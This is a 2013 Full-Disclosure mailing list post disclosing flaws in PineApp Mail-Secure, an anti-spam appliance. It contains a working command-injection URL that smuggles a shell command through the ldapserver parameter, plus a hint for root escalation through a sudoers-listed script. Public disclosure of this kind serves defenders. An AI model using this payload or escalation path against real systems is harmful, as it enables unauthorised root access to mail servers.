[<prev] [next>] [day] [month] [year] [list]
Message-ID: <SNT149-W861FFEC8590F3A4AA02A4FFA1B0@phx.gbl>
Date: Tue, 15 Oct 2013 04:26:21 +0000
From: yello man <yelloman7@...look.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: remote root exploit in pineapp mail-secure
pineapp makes an anti-spam product, which can be downloaded for vmware, etc.
the security of the product is a fucking joke, containing everything from authentication bypass to root exploits. there is really no hope, the developers didnt even try. they can patch those specific vulnerabilities, but have no idea what theyre doing. i only scratched its surface.
unfiltered system() in
http://192.168.9.2/aliases-x.php?getLdapDC=wtf&ldapserver=;id>/tmp/wtf;
escalate to root by creating for example /usr/local/bin/cfma-mirror.sh (in sudoers)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists